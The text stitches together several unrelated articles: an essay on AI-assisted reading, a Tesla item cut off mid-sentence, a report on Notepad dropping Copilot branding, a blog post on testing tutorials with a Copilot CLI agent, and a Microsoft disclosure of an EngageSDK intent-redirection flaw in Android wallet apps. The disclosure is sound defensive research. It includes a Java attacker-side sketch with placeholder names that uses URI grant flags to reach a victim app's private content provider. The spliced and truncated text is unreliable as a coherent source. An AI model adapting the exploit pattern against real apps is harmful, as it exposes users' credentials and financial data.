This is a follow-up to my recent piece “AI Coach or AI Ghostwriter? The Choice Is Yours,” which argued that AI can either sharpen your thinking or replace it. That piece was about writing. This one is about the other side of the coin: reading. The practical question is: how do you use AI to become a more productive reader rather than a lazier one?
Back in 2006, my UW students and I coined the term “machine reading” to describe the autonomous understanding of text by computers (Etzioni, Banko, & Cafarella, AAAI 2006). Two decades later, large language models (LLMs) can digest, summarize, and answer questions about text with startling competence. The irony is that the biggest consumers of this capability are people, using AI to do our reading for us.
AI-assisted reading has become so pervasive that we are approaching the absurdity captured in Tom Fishburne’s famous Marketoonist cartoon: “AI Written, AI Read.” One AI writes the memo, another AI summarizes it, with minimal human involvement.
The simplest use of AI for reading is summarization, and it certainly has its merits. Drop a 50-page PDF into your favorite LLM, ask for a summary, and you’ll get one in seconds.
But that summary is merely a skeleton. It strips away the voice, the best lines, the telling details, and the nuances that can make or break your understanding. If you are reading a legal contract, the details are the whole point. If you are reading a competitor’s product announcement, the spin they put on the numbers matters more than the numbers themselves. A skeleton doesn’t have a pulse!
AI-assisted reading punishes passivity. A recent Wharton study of over 10,000 participants found that people who relied on AI-generated summaries showed shallower knowledge and offered fewer concrete facts afterward compared to those who engaged with original sources. Advice written after AI use was shorter, less factual, and more homogeneous across users. In other words, AI summaries do not just compress text. They flatten it. Speed reading via AI can be a bit like speed dating: you cover a lot of ground, but you do not actually know anyone when you leave.
The fundamental question here is not productivity. It is about the impact of AI reading on you as the reader: What happens to your retention, your understanding, your ability to synthesize across sources? Are you winning by doing this, or are you atrophying the cognitive muscle that makes you good at your job? Outsourcing your thinking to AI is not productivity gain; it’s a competence leak.
My practical advice is: treat the summary as a triage tool, not a destination. Use it to decide whether a document deserves your time. That is genuinely valuable. The world produces more text than any human can process, and AI can help you sort the wheat from the chaff in minutes instead of hours. But once you decide that something matters, put down the summary and engage with the source.
The real power of AI reading lies not in one-shot summarization but in dialog. Think of it as an interrogation of the document, focused on what interests you. Upload the contract, the research paper, or the earnings call transcript, and then start asking questions. What are the three riskiest clauses? How does this methodology compare to the Chen et al. paper from last year? Where does the CFO’s commentary contradict the numbers in Table 4? This is not a command you fire off and forget. It is a back-and-forth conversation between you and the AI about the text, one that surfaces specific quotes, draws connections to related materials, and drills into exactly what you need. The quality of the conversation depends entirely on the quality of your questions. AI-assisted reading rewards curiosity.
A word of caution that I can’t repeat often enough: always verify anything important yourself. AI models hallucinate. They fabricate quotes, invent statistics, and present fiction with the serene confidence of a tenured professor. The verification step is essential. If you skip it, you are not reading with AI. You are gambling with AI.
You also want to adopt different reading strategies for different tasks, just as you would without AI. Summarization is fine for getting the gist of a piece, for sorting your inbox, for deciding what to read next. It will not serve you well if you need to retain the content, defend it in a meeting, or build on it in your own work. For those tasks, you need the interrogation approach, and you need to supplement it with old-fashioned human reading of the passages the AI points you to.
Used well, AI can make you a better, faster, more thorough reader by helping you navigate more material, ask sharper questions, and spot connections you would have missed. Used badly, it turns you into a consumer of predigested pablum, the intellectual equivalent of living on protein shakes when there is a farmers’ market across the street.
The machines are happy to read for you, but they won’t understand for you. The choice, as always, is yours.
It looks like a smaller, cheaper Tesla is back on the menu.
Today, Reuters is reporting that the electric automaker is calling around to suppliers about building an all-new electric SUV (that is, one not based on the Model 3 or the Model Y) that would be more affordable than its current lineup. The report, which is based on four anonymous sources in the know, says the vehicle would be built first in China before eventually being brought to the US and European markets.
If true, this would represent a pretty major reversal for Tesla, and especially for Elon Musk, who has insisted over the past few years that the company doesn't need to make …
It’s finally happening! The Notepad app for Windows Insiders has officially ditched the Copilot branding in favor of a subtler “Writing tools” icon. Until now, Notepad had a very prominent, colorful Copilot logo near the top-right corner, which everyone despised despite the ability to disable it.
Snipping Tool also had a Copilot icon that showed up after selecting an area with Quick markup enabled. But now, it seems even the regular version of Snipping Tool for all users has quietly removed the Copilot logo. Unlike Notepad, there was no option to manually disable Copilot in the Snipping Tool, which makes this a remarkable change.
Notepad and Snipping Tool remove Copilot
About three weeks ago, on March 20, the President of Windows and Devices, Pavan Davuluri, published a blog post for Windows Insiders titled “Our commitment to Windows quality”. It was basically Microsoft admitting that they went too far with the AI push, along with a clear roadmap to fix Windows 11.
One of the highlights of the blog was Microsoft’s decision to reduce “unnecessary Copilot entry points, starting with apps like Snipping Tool, Photos, Widgets, and Notepad.”
Although last in the list, Notepad has now removed the Copilot logo from the toolbar and replaced it with a new pen icon, which, when hovered over, shows “Writing tools” with no mention of the dreaded AI word.
And just like before, you can also turn off this AI tool in the Notepad settings. However, the option is now under “Advanced Features” and not “AI Features.”
Windows Notepad removed Copilot branding
In Notepad v11.2512.28.0, Microsoft removed Copilot branding completely from the Write, Rewrite, Summarize tools section and Notepad settings.
Windows Notepad version number that removed Copilot
Note that Microsoft didn’t completely remove AI from Notepad. It is just the Copilot logo and branding that were removed.
There will be skeptics and critics who say the company could’ve removed AI completely, but I beg to differ: AI isn’t going away. All of big tech has already invested too much in it, and it’s only fair to treat Microsoft with the same respect, or disrespect, as the rest, depending on how you see AI.
The good news is that the Copilot branding, which is what really kicked off the backlash Microsoft is dealing with now, including the “Microslop” moniker, is finally going away.
Plus, the AI that still exists in Notepad can be turned off with the flip of a switch. Also, funnily enough, the tool doesn’t even mention AI anymore.
Writing tools powered by AI can be turned off in Notepad
To be honest, I didn’t expect Microsoft to follow through on removing branding it spent so many resources convincing users was the future, going as far as rebranding Office to Microsoft 365 Copilot.
Copilot in Notepad is renamed to Writing tools
Notepad settings used to have an “AI Features” section with only Copilot under it. Now it’s renamed to Advanced Features, with Writing tools as the only entry. From the looks of it, there is no change in functionality; it’s purely a rebranding.
AI Features in Notepad renamed to Writing features
Notepad without Copilot doesn’t remove AI features
Turning off Writing tools will also remove the AI pen icon near the top-right corner.
Notepad with Writing tools turned off
Notepad has turned from a simple text editor into a full-fledged editor with formatting, spell check, tables, and Markdown support, an expansion that was even responsible for an 8.8-rated security issue in the app. Notepad is also getting image support, as first reported by Windows Latest. Fortunately, most of these features can be turned off manually if you don’t need them.
Snipping Tool doesn’t show the Copilot icon anymore
Although I’m a regular user of Snipping Tool, I didn’t notice the Copilot icon was missing from the app until now. It just goes to show how easy the icon had become to ignore, given that it was seen everywhere in Windows…
The Copilot icon from Snipping Tool has been removed
Also, unlike Notepad, there is no sign of AI anywhere in the Snipping Tool as of now.
Either way, the removal of Copilot from Notepad and Snipping Tool is a sign that Microsoft wasn’t bluffing about scaling down Copilot integration throughout Windows. But don’t be fooled into thinking that the company is removing AI. It’s just the approach that is changing.
For early-stage open-source projects, the “Getting started” guide is often the first real interaction a developer has with the project. If a command fails, an output doesn’t match, or a step is unclear, most users won’t file a bug report; they will just move on.
Drasi, a CNCF sandbox project that detects changes in your data and triggers immediate reactions, is supported by our small team of four engineers in Microsoft Azure’s Office of the Chief Technology Officer. We have comprehensive tutorials, but we ship code faster than we can manually re-test them against it.
We didn’t realize how big this gap was until late 2025, when GitHub updated its Dev Container infrastructure and bumped the minimum Docker version. The update broke the Docker daemon connection, and every single tutorial stopped working. Because we relied on manual testing, we didn’t immediately know the extent of the damage. Any developer trying Drasi during that window would have hit a wall.
This incident forced a realization: with advanced AI coding assistants, documentation testing can be converted to a monitoring problem.
The problem: Why does documentation break?
Documentation usually breaks for two reasons:
1. The curse of knowledge
Experienced developers write documentation with implicit context. When we write “wait for the query to bootstrap,” we know to run `drasi list query` and watch for the `Running` status, or even better to run the `drasi wait` command. A new user has no such context. Neither does an AI agent. They read the instructions literally and don’t know what to do. They get stuck on the “how,” while we only document the “what.”
2. Silent drift
Documentation doesn’t fail loudly like code does. When you rename a configuration file in your codebase, the build fails immediately. But when your documentation still references the old filename, nothing happens. The drift accumulates silently until a user reports confusion.
This is compounded for tutorials like ours, which spin up sandbox environments with Docker, k3d, and sample databases. When any upstream dependency changes—a deprecated flag, a bumped version, or a new default—our tutorials can break silently.
The solution: Agents as synthetic users
To solve this, we treated tutorial testing as a simulation problem. We built an AI agent that acts as a “synthetic new user.”
This agent has three critical characteristics:
It is naïve: It has no prior knowledge of Drasi—it knows only what is explicitly written in the tutorial.
It is literal: It executes every command exactly as written. If a step is missing, it fails.
It is unforgiving: It verifies every expected output. If the doc says “You should see ‘Success’” and the command-line interface (CLI) just returns silently, the agent flags it and fails fast.
The stack: GitHub Copilot CLI and Dev Containers
We built a solution using GitHub Actions, Dev Containers, Playwright, and the GitHub Copilot CLI.
Our tutorials require heavy infrastructure:
A full Kubernetes cluster (k3d)
Docker-in-Docker
Real databases (such as PostgreSQL and MySQL)
We needed an environment that exactly matches what our human users experience. If users run in a specific Dev Container on GitHub Codespaces, our test must run in that same Dev Container.
The architecture
Inside the container, we invoke the Copilot CLI in prompt mode (-p) with a specialized system prompt (view the full prompt here).
This gives us an agent that can execute terminal commands, write files, and run browser scripts, just like a human developer sitting at a terminal. For the agent to simulate a real user, it needs exactly those capabilities.
To let the agent open webpages and interact with them as any human following the tutorial steps would, we also install Playwright in the Dev Container. The agent takes screenshots along the way, which it then compares against those provided in the documentation.
Security model
Our security model is built around one principle: the container is the boundary.
Rather than trying to restrict individual commands (a losing game when the agent needs to run arbitrary node scripts for Playwright), we treat the entire Dev Container as an isolated sandbox and control what crosses its boundaries: no outbound network access beyond localhost, a Personal Access Token (PAT) with only “Copilot Requests” permission, ephemeral containers destroyed after each run, and a maintainer-approval gate for triggering workflows.
Dealing with non-determinism
One of the biggest challenges with AI-based testing is non-determinism. Large language models (LLMs) are probabilistic—sometimes the agent retries a command; other times it gives up.
Our prompts also include a list of tight constraints that keep the agent from going on a debugging journey, directives that control the structure of the final report, and skip directives that tell the agent to bypass optional tutorial sections, such as setting up external services.
Artifacts for debugging
When a run fails, we need to know why. Since the agent runs in a transient container, we can’t just connect over Secure Shell (SSH) and look around.
So our agent preserves evidence of every run: screenshots of web UIs, terminal output of critical commands, and a final Markdown report detailing its reasoning.
These artifacts are uploaded to the GitHub Action run summary, allowing us to “time travel” back to the exact moment of failure and see what the agent saw.
Parsing the agent’s report
With LLMs, getting a definitive “Pass/Fail” signal that a machine can understand can be challenging. Left to its own devices, an agent might write a long, nuanced conclusion rather than a crisp verdict.
To make this actionable in a CI/CD pipeline, we had to do some prompt engineering: we explicitly instructed the agent to end its report with an unambiguous, machine-readable verdict.
Simple techniques like this bridge the gap between AI’s fuzzy, probabilistic outputs and CI’s binary pass/fail expectations.
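Bridging that gap takes very little machinery. Here is a rough sketch, shown in Java purely for concreteness (the same check can be a one-line shell step), of the kind of verdict gate a CI step can run; the report filename and the `FINAL VERDICT: PASS` sentinel are assumptions for the example, not necessarily the exact strings used in our pipeline:

```java
import java.nio.file.Files;
import java.nio.file.Path;

// Minimal verdict gate: exits 0 only when the agent's report contains the agreed
// sentinel line. The filename and token below are illustrative placeholders.
public class VerdictGate {
    public static void main(String[] args) throws Exception {
        Path report = Path.of(args.length > 0 ? args[0] : "agent-report.md");
        boolean passed = Files.readAllLines(report).stream()
                .map(String::trim)
                .anyMatch("FINAL VERDICT: PASS"::equals);
        System.out.println(passed ? "Tutorial evaluation passed" : "Tutorial evaluation failed");
        System.exit(passed ? 0 : 1); // binary signal the CI pipeline can act on
    }
}
```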
Automation
We now have an automated version of the workflow that runs weekly, evaluating all our tutorials in parallel; each tutorial gets its own sandbox container and a fresh perspective from the agent acting as a synthetic user. If any tutorial evaluation fails, the workflow is configured to file an issue on our GitHub repo.
This workflow can optionally also be run on pull requests, but to prevent attacks we have added a maintainer-approval requirement and use the `pull_request_target` trigger, which means that even for pull requests from external contributors, the workflow that executes is the one in our main branch.
Running the Copilot CLI requires a PAT, which is stored in the environment secrets for our repo. To make sure it does not leak, each run requires maintainer approval, except the automated weekly run, which only runs on the `main` branch of our repo.
What we found: Bugs that matter
Since implementing this system, we have run over 200 “synthetic user” sessions. The agent has identified 18 distinct issues, ranging from serious environment problems to documentation issues like the ones below. Fixing them improved the docs for everyone, not just the bot.
Implicit dependencies: In one tutorial, we instructed users to create a tunnel to a service. The agent ran the command, and then—following the next instruction—killed the process to run the next command. The fix: We realized we hadn’t told the user to keep that terminal open. We added a warning: “This command blocks. Open a new terminal for subsequent steps.”
Missing verification steps: We wrote: “Verify the query is running.” The agent got stuck: “How, exactly?” The fix: We replaced the vague instruction with an explicit command: `drasi wait -f query.yaml`.
Format drift: Our CLI output had evolved. New columns were added; older fields were deprecated. The documentation screenshots still showed the 2024 version of the interface. A human tester might gloss over this (“it looks mostly right”). The agent flagged every mismatch, forcing us to keep our examples up to date.
AI as a force multiplier
We often hear about AI replacing humans, but in this case, the AI is providing us with a workforce we never had.
To replicate what our system does—running six tutorials across fresh environments every week—we would need a dedicated QA resource or a significant budget for manual testing. For a four-person team, that is impossible. By deploying these Synthetic Users, we have effectively hired a tireless QA engineer who works nights, weekends, and holidays.
Our tutorials are now validated weekly by synthetic users. Try the Getting Started guide yourself and see the results firsthand. And if you’re facing the same documentation drift in your own project, consider GitHub Copilot CLI not just as a coding assistant but as an agent: give it a prompt, a container, and a goal, and let it do the work a human doesn’t have time for.
During routine security research, we identified a severe intent redirection vulnerability in a widely used third-party Android SDK called EngageSDK. This flaw allows apps on the same device to bypass the Android security sandbox and gain unauthorized access to private data. With the affected third-party crypto wallet applications alone accounting for over 30 million installations, PII, user credentials, and financial data were exposed to risk. All of the detected apps using vulnerable versions have been removed from Google Play.
Following our Coordinated Vulnerability Disclosure practices (via Microsoft Security Vulnerability Research), we notified EngageLab and the Android Security Team. We collaborated with all parties to investigate and validate the issue, which was resolved as of November 3, 2025 in version 5.2.1 of the EngageSDK. This case shows how weaknesses in third‑party SDKs can have large‑scale security implications, especially in high‑value sectors like digital asset management.
As of the time of writing, we are not aware of any evidence indicating that this vulnerability has been exploited in the wild. Nevertheless, we strongly recommend that developers who integrate the affected SDK upgrade to the latest available version. While this is a vulnerability introduced by a third-party SDK, Android’s existing layered security model is capable of providing additional mitigations against exploitation of vulnerabilities through intents. Android has updated these automatic user protections to provide additional mitigation against the specific EngageSDK risks described in this report while developers update to the non-vulnerable version of EngageSDK. Users who previously downloaded a vulnerable app are protected.
In this blog, we provide a technical analysis of a vulnerability that bypasses core Android security mechanisms. We also examine why this issue is significant in the current landscape: apps increasingly rely on third‑party SDKs, creating large and often opaque supply‑chain dependencies.
As mobile wallets and other high‑value apps become more common, even small flaws in upstream libraries can impact millions of devices. These risks increase when integrations expose exported components or rely on trust assumptions that aren’t validated across app boundaries.
Because Android apps frequently depend on external libraries, insecure integrations can introduce attack surfaces into otherwise secure applications. We provide resources for three key audiences:
Developers: In addition to the best practices Android provides its developers, we provide practical guidance on identifying and preventing similar flaws, including how to review dependencies and validate exported components.
Researchers: Insights into how we discovered the issue and the methodology we used to confirm its impact.
General readers: An explanation of the implications of this vulnerability and why ecosystem‑wide vigilance is essential.
This analysis reflects Microsoft’s visibility into cross‑platform security threats. We are committed to safeguarding users, even in environments and applications that Microsoft does not directly build or operate. You can find a detailed set of recommendations, detection guidance and indicators at the end of this post to help you assess exposure and strengthen protections.
Technical details
The Android operating system integrates a variety of security mechanisms, such as memory isolation, filesystem discretionary and mandatory access controls (DAC/MAC), biometric authentication, and network traffic encryption. Each of these components functions according to its own security framework, which may not always align with the others[1].
Unlike many other operating systems where applications run with the user’s privileges, Android assigns each app a unique user ID and executes it within its own sandboxed environment. Each app has a private directory for storing data that is not meant to be shared. By default, other apps cannot access this private space unless the owning app explicitly exposes data through components known as content providers.
To facilitate communication between applications, Android uses intents[2]. Beyond inter-app messaging, intents also enable interaction among components within the same application as well as data sharing between those components.
It’s worth noting that while any application can send an intent to another app or component, whether that intent is actually delivered—and more broadly, whether the communication is permitted—depends on the identity and permissions of the sending application.
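For readers less familiar with Android, the distinction between implicit intents (resolved by the system) and explicit intents (aimed at a specific component) matters later in this analysis. The minimal illustration below uses placeholder package, class, and extra names:

```java
import android.content.Intent;
import android.net.Uri;

// Placeholders throughout; this only illustrates the two delivery styles.
final class IntentExamples {

    // Implicit intent: declares an action and lets the system resolve which component handles it.
    static Intent implicitExample() {
        return new Intent(Intent.ACTION_VIEW, Uri.parse("https://example.com"));
    }

    // Explicit intent: names the exact package and component that must receive it,
    // which works even for components in another app, provided they are exported.
    static Intent explicitExample() {
        Intent intent = new Intent();
        intent.setClassName("com.example.otherapp", "com.example.otherapp.ExportedActivity");
        intent.putExtra("message", "data crossing the app boundary");
        return intent;
    }
}
```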
Intent redirection vulnerability
Intent Redirection occurs when a threat actor manipulates the contents of an intent that a vulnerable app sends using its own identity and permissions.
In this scenario, the threat actor leverages the trusted context of the affected app to run a malicious payload with the app’s privileges. This can lead to:
Unauthorized access to protected components
Exposure of sensitive data
Privilege escalation within the Android environment
Figure 1. Visual representation of an intent redirection.
The Android Security Team classifies this vulnerability as severe. Apps flagged as vulnerable are subject to enforcement actions, including potential removal from the platform[3].
EngageLab SDK intent redirection
Developers use the EngageLab SDK to manage messaging and push notifications in mobile apps. It functions as a library that developers integrate into Android apps as a dependency. Once included, the SDK provides APIs for handling communication tasks, making it a core component for apps that require real-time engagement.
The vulnerability was identified in an exported activity (MTCommonActivity) that is added to an application’s Android manifest when the library is included in a project and the app is built. The activity appears only in the merged manifest, which is generated post-build (see figure below), and is therefore sometimes missed by developers. Consequently, it often escapes detection during development but remains exploitable in the final APK.
Figure 2. The vulnerable MTCommonActivity activity is added to the merged manifest.
When an activity is declared as exported in the Android manifest, it becomes accessible to other applications installed on the same device. This configuration permits any other application to explicitly send an intent to this activity.
The following section outlines the intent handling process from the moment the activity receives an intent to when it dispatches one under the affected application’s identity.
Intent processing in the vulnerable activity
When an activity receives an intent, its response depends on its current lifecycle state:
If the activity is starting for the first time, the onCreate() method runs.
If the activity is already active, the onNewIntent() method runs instead.
In the vulnerable MTCommonActivity, both callbacks invoke the processIntent() method.
Figure 3: Calling the processIntent() method.
This method (see figure below) begins by initializing the uri variable on line 10 using the data provided in the incoming intent. If the uri variable is not empty then, according to line 16, it invokes the processPlatformMessage() method:
Figure 4: The processIntent() method.
The processPlatformMessage() method instantiates a JSON object using the uri string supplied as an argument to this method (see line 32 below):
Figure 5: The processPlatformMessage() method.
Each branch of the if statement checks the JSON object for a field named n_intent_uri. If this field exists, the method performs the following actions:
Creates a NotificationMessage object
Initializes its intentUri field by using the appropriate setter (see line 52).
An examination of the intentUri field in the NotificationMessage class identified the following method as a relevant point of reference:
Figure 6: intentUri usage overview.
On line 353, the method above obtains the intentUri value and attempts to create a new intent from it by calling the method a() on line 360. The returned intent is subsequently dispatched using the startActivity() method on line 365. The a() method is particularly noteworthy, as it serves as the primary mechanism responsible for intent redirection:
Figure 7: Overview of vulnerable code.
This method appears to construct an implicit intent by invoking setComponent(), which clears the target component of the parseUri intent by assigning a null value (line 379). Under normal circumstances, such behavior would result in a standard implicit intent, which poses minimal risk because it does not specify a concrete component and therefore relies on the system’s resolution logic.
However, as observed on line 377, the method also instantiates a second intent variable, whose purpose is not immediately evident, and which incorporates an explicit intent. Crucially, this explicitly targeted intent is the one returned at line 383, rather than the benign parseUri intent.
Another notable point is that the parseUri() method (at line 376) is called with the URI_ALLOW_UNSAFE flag (constant value 4), which can permit access to an application’s content providers [6] (see exploitation example below).
These substitutions fundamentally alter the method’s behavior: instead of returning a non‑directed, system‑resolved implicit intent, it returns an intent with a predefined component, enabling direct invocation of the targeted activity as well as access to the application’s content providers. As noted previously, this vulnerability can, among other consequences, permit access to the application’s private directory by gaining entry through any available content providers, even those that are not exported.
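Putting the pieces together, the vulnerable path can be paraphrased roughly as follows. This is a simplified reconstruction based on the behavior described above, not the SDK’s literal decompiled code, and the extra key is approximate:

```java
import android.app.Activity;
import android.content.Intent;
import org.json.JSONObject;

// Simplified paraphrase of the vulnerable flow, reconstructed from the description
// above; identifiers and the extra key are approximate, not the SDK's literal code.
public class VulnerableFlowParaphrase extends Activity {

    void processIncomingIntent(Intent incoming) throws Exception {
        String uri = incoming.getStringExtra("uri"); // attacker-controlled string (key is approximate)
        if (uri == null || uri.isEmpty()) {
            return;
        }
        JSONObject json = new JSONObject(uri);
        String intentUri = json.optString("n_intent_uri");
        if (!intentUri.isEmpty()) {
            // URI_ALLOW_UNSAFE (value 4) lets the parsed intent keep content-provider grant flags.
            Intent redirected = Intent.parseUri(intentUri, Intent.URI_ALLOW_UNSAFE);
            // As described above, the intent that is ultimately dispatched carries an explicit
            // component rather than the component-cleared implicit one.
            startActivity(redirected); // sent with the vulnerable app's identity and permissions
        }
    }
}
```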
Figure 8: Getting READ/WRITE access to non-exported content providers.
Exploitation starts when a malicious app creates an intent object with a crafted URI in the extra field. The vulnerable app then processes this URI, creating and sending an intent using its own identity and permissions.
Due to the URI_ALLOW_UNSAFE flag, the intent URI may include the following flags:
FLAG_GRANT_PERSISTABLE_URI_PERMISSION
FLAG_GRANT_READ_URI_PERMISSION
FLAG_GRANT_WRITE_URI_PERMISSION
When combined, these flags grant persistent read and write access to the app’s private data.
After the vulnerable app processes the intent and applies these flags, the malicious app is authorized to interact with the target app’s content provider. This authorization remains active until the target app explicitly revokes it [5]. As a result, the internal directories of the vulnerable app are exposed, which allows unauthorized access to sensitive data in its private storage space. The following image illustrates an example of an exploitation intent:
Figure 9: Attacking the MTCommonActivity.
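For illustration, an exploitation intent along the lines shown in Figure 9 could be assembled as sketched below. Every identifier in the sketch (victim package, activity path, provider authority, and extra key) is a placeholder rather than a real value, so this is a structural outline rather than a working exploit for any specific app:

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import org.json.JSONObject;

// Hypothetical attacker-side sketch with placeholders throughout; it mirrors the
// structure described in the text and Figure 9, not any real app's details.
public class MaliciousSenderActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        try {
            // Inner intent: points back at an activity in this (attacking) app and names the
            // victim's non-exported content provider as its data URI, with grant flags attached.
            Intent inner = new Intent();
            inner.setClassName(getPackageName(), getPackageName() + ".ReceiverActivity");
            inner.setData(Uri.parse("content://com.victim.app.provider/")); // placeholder authority
            inner.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION
                    | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
                    | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);

            // Serialize it into the JSON field the SDK looks for (n_intent_uri).
            JSONObject payload = new JSONObject();
            payload.put("n_intent_uri", inner.toUri(Intent.URI_INTENT_SCHEME));

            // Outer intent: delivered to the exported MTCommonActivity in the victim app.
            Intent attack = new Intent();
            attack.setClassName("com.victim.app", "com.victim.sdk.MTCommonActivity"); // placeholder names
            attack.putExtra("uri", payload.toString()); // extra key is a placeholder
            startActivity(attack);
        } catch (Exception e) {
            // JSONException / ActivityNotFoundException handling omitted in this sketch.
        }
    }
}
```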
Affected applications
A significant number of apps using this SDK are part of the cryptocurrency and digital‑wallet ecosystem. Because of this, the consequences of this vulnerability are especially serious. Before notifying the vendor, Microsoft confirmed the flaw in multiple apps on the Google Play Store.
The affected wallet applications alone accounted for more than 30 million installations, and when including additional non‑wallet apps built on the same SDK, the total exposure climbed to over 50 million installations.
Disclosure timeline
Microsoft initially identified the vulnerability in version 4.5.4 of the EngageLab SDK. Following Coordinated Vulnerability Disclosure (CVD) practices through Microsoft Security Vulnerability Research (MSVR), the issue was reported to EngageLab in April 2025. Additionally, Microsoft notified the Android Security Team because the affected apps were distributed through the Google Play Store.
EngageLab addressed the vulnerability in version 5.2.1, released on November 3, 2025. In the fixed version, the vulnerable activity is set to non-exported, which prevents it from being invoked by other apps.
April 2025: Vulnerability identified in EngageLab SDK v4.5.4; issue reported to EngageLab.
May 2025: Issue escalated to the Android Security Team for affected applications distributed through the Google Play Store.
November 3, 2025: EngageLab released v5.2.1, addressing the vulnerability.
Mitigation and protection guidance
Android developers utilizing the EngageLab SDK are strongly advised to upgrade to the latest version promptly.
Our research indicates that integrating external libraries can inadvertently introduce features or components that compromise application security. Specifically, an exported component added to the merged Android manifest can easily be overlooked, creating a potential attack surface. To keep your apps secure, always review the merged Android manifest, especially when you incorporate third-party SDKs. This helps you identify any components or permissions that might affect your app’s security or behavior.
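Beyond reviewing the merged manifest, components that turn untrusted input into intents should validate the result before dispatching it. The following is a generic defensive sketch of that idea, not the fix EngageLab shipped (version 5.2.1 simply marks the activity as non-exported); the class and method names are illustrative:

```java
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import java.net.URISyntaxException;

// Generic defensive sketch: validate an intent parsed from untrusted input before
// forwarding it with this app's identity. Not EngageLab's actual fix.
public class SafeRedirectActivity extends Activity {

    void forwardUntrustedUri(String untrustedUri) throws URISyntaxException {
        Intent parsed = Intent.parseUri(untrustedUri, 0); // avoid URI_ALLOW_UNSAFE
        ComponentName target = parsed.resolveActivity(getPackageManager());
        if (target == null || !getPackageName().equals(target.getPackageName())) {
            return; // never redirect to components outside this app
        }
        // Strip any content-provider grant flags smuggled in through the URI (removeFlags is API 26+).
        parsed.removeFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
                | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
        startActivity(parsed);
    }
}
```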
Keep your users and applications secure
Strengthening mobile‑app defenses doesn’t end with understanding this vulnerability.
[1] Mayrhofer, René, Jeffrey Vander Stoep, Chad Brubaker, Dianne Hackborn, Bram Bonné, Güliz Seray Tuncay, Roger Piqueras Jover, and Michael A. Specter. The Android Platform Security Model (2023 update). Originally published in ACM Transactions on Privacy and Security, vol. 24, no. 3, 2021, pp. 1–35. arXiv:1904.05572. https://doi.org/10.48550/arXiv.1904.05572.
This research is provided by Microsoft Defender Security Research with contributions from Dimitrios Valsamaras and other members of Microsoft Threat Intelligence.
Learn more
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
AI tool use is inescapable, especially if you're a young person trying to get an edge in an increasingly difficult job market. But cognitive offloading is dangerous no matter what age you are. Building a knowledge base can save your brain and skills from atrophy.